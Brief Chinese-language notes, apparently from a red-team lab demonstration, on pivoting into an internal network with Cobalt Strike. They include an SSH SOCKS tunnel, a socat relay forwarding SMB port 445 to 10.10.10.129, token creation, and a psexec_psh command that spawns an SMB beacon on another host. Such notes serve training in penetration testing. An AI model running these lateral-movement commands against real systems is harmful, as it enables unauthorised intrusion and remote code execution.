ssh-1080在本地创建动态端口1080进行转发连接到192.168.0.154
socat TCP-LISTEN:445,fork SOCKS4:127.0.0.1:10.10.10.129:445
访问本地的445端口的数据转发到10.10.10.129的445端口上
使用beacon创建token令牌在beacon终端psexec_psh 192.168.0.134 smb-beacon
演示:
把ip末尾105机子会话-sleep为1
ssh-1080在本地创建动态端口1080进行转发连接到192.168.0.154
ping一下server2008这台内网机子,看看能不能连通
隧道转发到目标ip129机子
访问ip为134机子默认c盘
这边终止掉
制作令牌
访问ip为134的c盘目录
然后搞个powershell连接到10.10.10.129目标机子上去
这个时候就得到一台主机
我们可以进入beacon,然后输入shell ipconfig